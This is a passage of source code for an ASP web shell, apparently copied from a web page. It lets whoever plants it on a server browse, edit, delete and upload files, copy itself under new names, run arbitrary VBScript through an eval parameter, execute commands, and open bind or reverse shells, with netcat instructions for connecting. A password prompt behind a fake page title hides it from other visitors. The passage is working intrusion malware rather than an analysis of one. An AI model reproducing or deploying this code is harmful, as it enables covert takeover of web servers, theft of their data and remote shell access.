    result = Replace(htmlspecialchars(result), " ", "&nbsp;" ) result = nl2br(result) End If End If ElseIf(Request.QueryString("eval") <> "") Then Response.ContentType = "text/html" sblm = Mid(Request.QueryString,5,InStr(Request.QueryString,"eval") - 6) Response.Write "<form action=""?"" method=""get"">" Response.Write "<input type=""hidden"" name=""dir"" value=""" & sblm & " "" />" Response.Write "<input style=""width:60%;"" type=""text"" name=""eval"" value="""" />" Response.Write "<input type=""submit"" name=""btnEval"" value=""Eval"" / ></form>" Response.Write execute(Request.QueryString("eval")) Response.End ElseIf(Request.QueryString("properties") <> "") Then fname = xcleanpath(Request.QueryString("properties")) If(Request.QueryString("oldfilename") <> "") Then oldname = Request.QueryString("oldfilename") Set fs = Server.CreateObject("Scripting.FileSystemObject") If(is_file(oldname)) Then Set f = fs.GetFile(oldname) Elseif(is_dir(oldname)) Then Set f = fs.GetFolder(oldname) End If f.Move(fname) set f = nothing set fs = nothing End If dir = Request.QueryString("dir") fcont = "" fview = "" If(is_dir(fname)) Then fsize = "DIR" fname = Mid(fname,1,Len(fname)-1) fcont = xdir(fname) faction = "<a href=""?dir=" & xcleanpath(fname) & "&properties=" & xcleanpath(fname) & """>Properties</a> <a href=""?dir=" & xcleanpath(xparen tfolder(fname)) & "&del=" & xcleanpath(fname) & """>Remove</a>" Set fs = Server.CreateObject("Scripting.FileSystemObject") Set f = fs.GetFolder(fname) filectime = xdateformat(f.DateCreated) fileatime = xdateformat(f.DateLastAccessed) filemtime = xdateformat(f.DateLastModified) set f=nothing set fs=nothing Else fname = Mid(fname,1,Len(fname)-1) fsize = xparsefilesize(xfilesize(fname)) & " <span class=""gaul" ">( </span>" & xfilesize(fname) & " bytes<span class=""gaul""> )</span>" xtype = "" If(Request.QueryString("type") <> "") Then xtype = Request.QueryString("type") Else Set fs = Server.CreateObject("Scripting.FileSystemObject ") Set f = fs.GetFile(fname) contype = LCase(f.Type)

    If(InStr(contype,"image")) Then xtype = "img" Else xtype = "text" End If End If If(xtype = "text") Then code = htmlspecialchars(xfileopen(fname,false)) fcont = "<div class=""boxcode"">" & nl2br(code) & "</div >" Elseif(xtype = "img") Then imglink = "<p><a href=""?img=" & fname & """ target=""_b lank""><span class=""gaul"">[ </span>view full size<span class=""gaul""> ]</span ></a></p>" fcont = "<div style=""text-align:center;width:100%;"">" & imglink & "<img width=""800"" src=""?img=" & fname & """ alt="""" style=""marg in:8px auto;padding:0;border:0;"" /></div>" Else fcont = "" End If Set fs = Server.CreateObject("Scripting.FileSystemObject") Set f = fs.GetFile(fname) filectime = xdateformat(f.DateCreated) fileatime = xdateformat(f.DateLastAccessed) filemtime = xdateformat(f.DateLastModified) set f=nothing set fs=nothing faction = "<a href=""?dir=" & xcleanpath(dir) & "&view=" & fname & """>Edit</a> <a href=""?get=" & fname & """>Download</a> <a href=""?dir=" & xcleanpath(dir) & "&del=" & fname & """>Remove</a>" fview = "<a href=""?dir=" & xcleanpath(dir) & "&properties=" & f name & "&type=text""><span class=""gaul"">[ </span>text<span class=""gaul""> ]</ span></a><a href=""?dir=" & xcleanpath(dir) & "&properties=" & fname & "&type=im g""><span class=""gaul"">[ </span>image<span class=""gaul""> ]</span></a>" End If fowner = xfileowner(fname) fperm = xfileperms(fname) result = "<div style=""display:inline;"">" &_ "<form action=""?"" method=""get"" style=""margin:0;padding:1px 8px;text -align:left;"">" &_ "<input type=""hidden"" name=""dir"" value=""" & dir & """ />" &_ "<input type=""hidden"" name=""oldfilename"" value=""" & fname & """ />" & faction & " &nbsp;" &_ "<span><input style=""width:50%;"" type=""text"" name=""properties"" val ue=""" & fname & """ />&nbsp;" &_ "<input style=""width:120px"" class=""btn"" type=""submit"" name=""btnRe name"" value=""Rename"" />" &_ "</span>" &_ "<div class=""fprop"">" &_ "Size = " & fsize & "<br />" &_ "Owner = <span class=""gaul"">( </span>" & fowner & "<span class=""gaul" "> )</span><br />" &_ "Permission = <span class=""gaul"">( </span>" & fperm & "<span class=""g aul""> )</span><br />" &_ "Create Time = <span class=""gaul"">( </span>" & filectime & "<span clas s=""gaul""> )</span><br />" &_ "Last Modified = <span class=""gaul"">( </span>" & filemtime & "<span cl ass=""gaul""> )</span><br />" &_ "Last Accessed = <span class=""gaul"">( </span>" & fileatime & "<span cl ass=""gaul""> )</span><br />" &_

    fview &_ "</div>" & fcont &_ "</form>" &_ "</div>" ElseIf((Request.QueryString("view") <> "") Or (Request.QueryString("filename") < > "")) Then msg = "" If(Request.Form("save") = "Save As") Then file = Trim(Request.Form("saveas")) content = Request.Form("filesource") If(xfilesave(file,content)) Then pesan = "File Saved" Else pesan = "Failed to save file" End If msg = "<span style=""float:right;""><span class=""gaul"">[ </spa n>" & pesan & "<span class=""gaul""> ]</span></span>" Else If(Request.QueryString("view") <> "") Then file = Trim(Request.QueryString("view")) Else file = xCwd & Trim(Request.QueryString("filename")) End If End If result = xfileopen(file,false) result = htmlspecialchars(result) result = "<p style=""padding:0;margin:0;text-align:left;""><a href=""?di r=" & xCwd & "&properties=" & file & """>" & xfilesummary(file) & "</a>" & msg & "</p><div style=""clear:both;margin:0;padding:0;""></div>" &_ "<form action=""?dir=" & xCwd & "&view=" & file & """ method=""post"">" &_ "<textarea name=""filesource"" style=""width:100%;height:200px;"">" & re sult & "</textarea>" &_ "<input type=""text"" style=""width:80%;"" name=""saveAs"" value=""" & file & """ />&nbsp;" &_ "<input type=""submit"" class=""btn"" style=""width:120px;"" name=""save "" value=""Save As"" /></form>" Else result = xdir(xCwd) End If '//################# Finalizing #######################========================= =============================] If(auth) Then If(Request.QueryString("bportC") <> "") Then bportC = Request.QueryString("bportC") Else bportC = shell_fav_port End If If(Request.QueryString("lportC") <> "") Then lportC = Request.QueryString("lportC") Else lportC = shell_fav_port End If html_title = shell_title & " " & xCwd html_head = "" &_ "<title>" & html_title & "</title>" &_ "<link rel=""SHORTCUT ICON"" href=""" & Request.ServerVariables("SCRIPT_NAME") & "?img=icon"" />" &_ "" & shell_style & "" &_ "<script type=""text/javascript"">" &_

    "function updateInfo(boxid,typ){" &_ " if(typ == 0){" &_ " var pola = 'example: (using netcat) run &quot;nc -l -p __PORT__& quot; and then press Connect'; " &_ " }" &_ " else{" &_ " var pola = 'example: (using netcat) press &quot;Listen&quot; and then run &quot;nc " & xServerIP & " __PORT__&quot;'; " &_ " }" &_ "" &_ " var portnum = document.getElementById(boxid).value;" &_ "" &_ " var hasil = pola.replace('__PORT__', portnum);" &_ " document.getElementById(boxid+'_').innerHTML = hasil;" &_ "}" &_ "" &_ "function show(boxid){" &_ " var box = document.getElementById(boxid);" &_ " if(box.style.display != 'inline'){" &_ " document.getElementById('newfile').style.display = 'none';" &_ " document.getElementById('newfolder').style.display = 'none';" &_ " document.getElementById('newupload').style.display = 'none';" &_ " document.getElementById('newchild').style.display = 'none';" &_ " document.getElementById('newconnect').style.display = 'none';" & _ " document.getElementById('div_eval').style.display = 'none';" &_ "" &_ " box.style.display = 'inline';" &_ " box.focus();" &_ " }" &_ " else box.style.display = 'none';" &_ "}" &_ "" &_ "function highlighthexdump(address){" &_ " var target = document.getElementById(address);" &_ " target.style.background = '" & shell_color & "';" &_ "}" &_ "function unhighlighthexdump(address){" &_ " var target = document.getElementById(address);" &_ " target.style.background = 'none';" &_ "}" &_ "</script>" html_body = "" &_ "<div id=""wrapper"">" &_ "<h1 onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" oncl ick=""window.location= '?';""><a href=""?"">" & shell_title & "</a></h1>" &_ "<div class=""box"">" & xHeader & "" &_ "<div class=""fpath"">" &_ xdrive() & xparsedir(xCwd) &_ "</div>" &_ "" &_ "<div class=""menu"">" &_ "<a href=""javascript:show('newfile');""><span class=""gaul"">[ </span> New File <span class=""gaul""> ]</span></a>&nbsp;" &_ "<a href=""javascript:show('newfolder');""><span class=""gaul"">[ </span>New Fol der<span class=""gaul""> ]</span></a>&nbsp;" &_ "<a href=""javascript:show('newchild');""><span class=""gaul"">[ </span>Replicat e<span class=""gaul""> ]</span></a>&nbsp;" &_ "<a href=""javascript:show('newupload');""><span class=""gaul"">[ </span>Upload< span class=""gaul""> ]</span></a>&nbsp;" &_

    "<a href=""javascript:show('newconnect');""><span class=""gaul"">[ </span>BindSh ell<span class=""gaul""> ]</span></a>&nbsp;" &_ "<a href=""javascript:show('div_eval');""><span class=""gaul"">[ </span>VBs Eval <span class=""gaul""> ]</span></a>&nbsp;" &_ "</div>" &_ "" &_ "<div class=""hidden"" id=""newconnect"">" &_ "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;""> " &_ "<table class=""tblBox"" style=""width:100%;"">" &_ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" &_ "<tr><td style=""width:130px;"">BackConnect</td><td style=""width:200px;"">" &_ "Port&nbsp;<input maxlength=""5"" id=""backC"" onkeyup=""updateInfo('backC',0);" " style=""width:60px;"" type=""text"" name=""bportC"" value=""" & bportC & """ / >" &_ "&nbsp;<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnCon nect"" value=""Connect"" />" &_ "</td>" &_ "<td><span id=""backC_"" class=""msgcon"">example: (using netcat) run &quot;nc l -p " & bportC & "&quot; and then press Connect</span></td>" &_ "</tr>" &_ "" &_ "<tr><td>Listen</td><td>" &_ "Port&nbsp;<input maxlength=""5"" id=""listenC"" onkeyup=""updateInfo('listenC', 1);"" style=""width:60px;"" type=""text"" name=""lportC"" value=""" & lportC & " "" />" &_ "&nbsp;<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnLis ten"" value=""Listen"" />" &_ "</td>" &_ "<td><span id=""listenC_"" class=""msgcon"">example: (using netcat) press &quot; Listen&quot; and then run &quot;nc " & xServerIP & " " & lportC & "&quot;</span> </td>" &_ "</tr>" &_ "</table>" &_ "</form>" &_ "</div>" &_ "" &_ "<div class=""hidden"" id=""newfolder"">" &_ "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;""> " &_ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" &_ "<table class=""tblBox"" style=""width:560px;"">" &_ "<tr><td style=""width:120px;"">New Foldername</td><td style=""width:304px;"">" &_ "<input style=""width:300px;"" type=""text"" name=""foldername"" value=""newfold er"" />" &_ "</td><td>" &_ "<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewfolder "" value=""Create"" />" &_ "</td></tr>" &_ "</table>" &_ "</form>" &_ "</div>" &_ "" &_ "<div class=""hidden"" id=""newfile"">" &_ "<form action=""?"" method=""get"" style=""display:inline;margin:0;padding:0;""> " &_ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" &_ "<table class=""tblBox"" style=""width:560px;"">" &_ "<tr><td style=""width:120px;"">New Filename</td><td style=""width:304px;"">" &_

    "<input style=""width:300px;"" type=""text"" name=""filename"" value=""newfile"" />" &_ "</td><td>" &_ "<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewfile"" value=""Create"" />" &_ "</td></tr>" &_ "</form>" &_ "</table>" &_ "</div>" &_ "" &_ "<div class=""hidden"" id=""newupload"">" &_ "<form method=""post"" action=""?dir=" & xCwd & "&upload=y"" enctype=""multipart /form-data"" style=""display:inline;margin:0;padding:0;"">" &_ "<table class=""tblBox"" style=""width:560px;"">" &_ "<tr><td style=""width:120px;"">Save as</td><td><input style=""width:300px;"" ty pe=""text"" name=""filename"" value="""" /></td></tr>" &_ "<tr><td style=""width:120px;"">From Url</td><td style=""width:304px;"">" &_ "<input style=""width:300px;"" type=""text"" name=""fileurl"" value="""" />" &_ "</td><td><input style=""width:100px;"" type=""submit"" class=""btn"" name=""btn NewUploadUrl"" value=""Get"" /></td></tr>" &_ "<tr><td style=""width:120px;"">From Computer</td><td style=""width:304px;"">" & _ "<input style=""width:300px;"" type=""file"" name=""filelocal"" />" &_ "</td><td>" &_ "<input style=""width:100px;"" type=""submit"" class=""btn"" name=""btnNewUpload Local"" value=""Get"" />" &_ "</td></tr>" &_ "</table>" &_ "</form>" &_ "</div>" &_ "" &_ "<div class=""hidden"" id=""newchild"">" &_ "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;""> " &_ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" &_ "<table class=""tblBox"" style=""width:560px;"">" &_ "<tr><td style=""width:120px;"">New Shellname</td><td style=""width:304px;"">" & _ "<input style=""width:300px;"" type=""text"" name=""childname"" value=""" & shel l_name & ".asp""; />" &_ "</td><td><input style=""width:100px;"" type=""submit"" class=""btn"" name=""btn Newchild"" value=""Create"" />" &_ "</td></tr>" &_ "</table>" &_ "</form>" &_ "</div>" &_ "" &_ "<div class=""hidden"" id=""div_eval"">" &_ "<form method=""get"" action=""?"" style=""display:inline;margin:0;padding:0;""> " &_ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" &_ "<table class=""tblBox"" style=""width:560px;"">" &_ "<tr><td>" &_ "<textarea name=""eval"" style=""width:100%;height:100px;""></textarea>" &_ "</td></tr><tr>" &_ "<td style=""text-align:right;""><input style=""width:100px;"" type=""submit"" c lass=""btn"" name=""btnEval"" value=""Eval"" /></td></tr>" &_ "</table>" &_ "</form>" &_ "</div>" &_

    "" &_ "<div class=""bottomwrapper"">" &_ "<div class=""cmdbox"">" &_ "<form action=""?"" method=""get"">" &_ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" &_ "<table style=""width:100%;""><tr>" &_ "<td style=""width:88%;""><input type=""text"" id=""cmd"" name=""cmd"" value=""" " style=""width:100%;"" /></td>" &_ "<td style=""width:10%;""><input type=""submit"" class=""btn"" name=""btnCommand "" style=""width:120px;"" value=""Execute"" /></td></tr></table>" &_ "</form>" &_ "</div>" &_ "" &_ "<div class=""result"" id=""result"">" &_ "" & result & "" &_ "</div></div></div></div>" Else html_title = shell_fake_name html_head = "<title>" & html_title & "</title>" & shell_style html_body = "" &_ "<div style=""margin:30px;"">" &_ "<div>" &_ "<form action=""?"" method=""post"">" &_ "<input id=""cmd"" type=""text"" name=""passw"" value="""" />" &_ "&nbsp;<input type=""submit"" name=""btnpasswd"" value=""Ok"" />" &_ "</form>" &_ "</div>" &_ "<div style=""font-size:10px;"">" & shell_fake_name & "</div>" &_ "</div>" End If If Not Uploaded Then If((Request.QueryString("cmd") <> "") Or (Request.Form("passw") <> "")) Then html_onload = "onload=""document.getElementById('cmd').focus();" "" Else html_onload = "" End If End If html_final = "" &_ "<html>" &_ "<head>" &_ "" & html_head & "" &_ "</head>" &_ "<body " & html_onload & ">" &_ "<div id=""mainwrapper"">" &_ "" & html_body & "" &_ "</div>" &_ "</body>" &_ "</html>" Response.BinaryWrite(html_final) %>

    You might also like